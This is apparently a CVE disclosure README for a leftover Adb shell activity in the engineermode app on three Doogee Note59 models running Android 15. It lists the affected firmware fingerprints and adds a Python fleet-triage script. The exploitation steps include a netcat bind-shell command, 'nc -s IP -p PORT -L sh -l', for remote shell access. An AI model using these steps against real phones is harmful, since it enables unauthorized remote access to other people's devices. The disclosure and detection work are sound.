CVE-2025-67264

This is another case where Doogee forgot to remove the Adb shell activity from com.sprd.engineermode, this time on their Unisoc units running Android 15. Three models are impacted, listed below with their fingerprints, because they all use exactly the same APK (same shasum aeb125dfb4c64d919c60364fc75a23f94ddfece5).

These devices run Android 15, which should be patched, since Unisoc removed the Adb shell activity in Android 14, and they have tool_service of course. However, both the boot image and engineermode report that they are running Android 13. engineermode is 9 MB, so it is the patched version, but they probably used the Android 13 VNDK and built the stock system as a pseudo-GSI, or I don't know. The result is that they reintroduced [this](https://nvd.nist.gov/vuln/detail/CVE-2025-31710) vulnerability.

The app on these models has the Adb shell activity and allows a reverse shell, but it is not system, so it is not possible to run the com.sammy.systools libs as binaries, source scripts or browse /sdcard. However, in the reverse shell command you can change the IP address to 0.0.0.0, or enter the phone's IP instead of 127.0.0.1, and then connect from another device using the phone's IP, assuming that device is on the same network as the phone.

The vulnerability works as explained in the main README and as shown in the screenshots (I will hide the IP). Open the Adb shell activity with adb shell on a PC or with a root activity launcher, as this time the app does not need to be launched from the dialer. Then enter `nc -s IP -p PORT -L sh -l` in the Adb shell prompt, replacing IP and PORT accordingly, and press start. Finally, connect from the terminal with `nc IP PORT`.

<img width="366" height="848" alt="RCE1" src="https://github.com/user-attachments/assets/c2109d1d-d205-40cd-9175-fa0589fdca08" /> <img width="757" height="175" alt="RCE2" src="https://github.com/user-attachments/assets/0401e4ca-e80d-40c9-a059-09207d381bac" />

Models impacted

Doogee Note59 Pro+

DOOGEE/1929ST/1929ST:15/AP3A.240905.015.A2/20250402:user/release-keys

DOOGEE/1929ST/1929ST:15/AP3A.240905.015.A2/20250910:user/release-keys

Doogee Note59 Pro

DOOGEE/1929SH_EEA/1929SH:15/AP3A.240905.015.A2/20250310:user/release-keys

Doogee Note59

DOOGEE/1929SC_EEA/1929SC:15/AP3A.240905.015.A2/20250226:user/release-keys
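
A fleet-triage check built from the fingerprints and APK hash listed on this page, as an added example that is not part of the original README: it parses Android build fingerprints and separates builds the page lists from records that only share the device or the engineermode APK hash. The `review` tier, the function names and the sample inventory are assumptions of this example, and the page does not confirm that unlisted builds are affected.

```python
import re

# Values copied from this page: shared engineermode APK SHA-1 and listed builds.
ENGINEERMODE_SHA1 = "aeb125dfb4c64d919c60364fc75a23f94ddfece5"
LISTED_BUILDS = {
    "DOOGEE/1929ST/1929ST:15/AP3A.240905.015.A2/20250402:user/release-keys",
    "DOOGEE/1929ST/1929ST:15/AP3A.240905.015.A2/20250910:user/release-keys",
    "DOOGEE/1929SH_EEA/1929SH:15/AP3A.240905.015.A2/20250310:user/release-keys",
    "DOOGEE/1929SC_EEA/1929SC:15/AP3A.240905.015.A2/20250226:user/release-keys",
}

# Android fingerprint layout: brand/product/device:release/id/incremental:type/tags
FIELDS = "brand product device release build_id incremental build_type tags".split()
_FP_RE = re.compile(
    r"([^/:]+)/([^/:]+)/([^/:]+):([^/:]+)/([^/:]+)/([^/:]+):([^/:]+)/([^/:]+)")

def parse_fingerprint(fingerprint):
    """Split a build fingerprint into named fields, or return None if malformed."""
    match = _FP_RE.fullmatch(fingerprint.strip())
    return dict(zip(FIELDS, match.groups())) if match else None

LISTED_DEVICES = {(p["brand"], p["device"])
                  for p in map(parse_fingerprint, LISTED_BUILDS)}

def classify(fingerprint, apk_sha1=None):
    """Return 'listed', 'review', 'not-listed' or 'unparsed' for one device record."""
    parsed = parse_fingerprint(fingerprint)
    if parsed is None:
        return "unparsed"
    if fingerprint.strip() in LISTED_BUILDS:
        return "listed"
    # Same APK hash, or a listed device on a build the page does not list:
    # not confirmed by the page, so flag it for manual inspection (assumption).
    same_apk = apk_sha1 is not None and apk_sha1.lower() == ENGINEERMODE_SHA1
    if same_apk or (parsed["brand"], parsed["device"]) in LISTED_DEVICES:
        return "review"
    return "not-listed"

# Constructed inventory rows: (fingerprint, engineermode APK SHA-1 or None).
SAMPLE_INVENTORY = [
    ("DOOGEE/1929SH_EEA/1929SH:15/AP3A.240905.015.A2/20250310:user/release-keys", None),
    ("DOOGEE/1929ST/1929ST:15/AP3A.240905.015.A2/20251201:user/release-keys", None),
    ("EXAMPLE/demo/demo:15/AP3A.240905.015.A2/1:user/release-keys", ENGINEERMODE_SHA1.upper()),
    ("not a fingerprint", None),
]

if __name__ == "__main__":
    for fp, digest in SAMPLE_INVENTORY:
        print(f"{classify(fp, digest):10}  {fp}")
```
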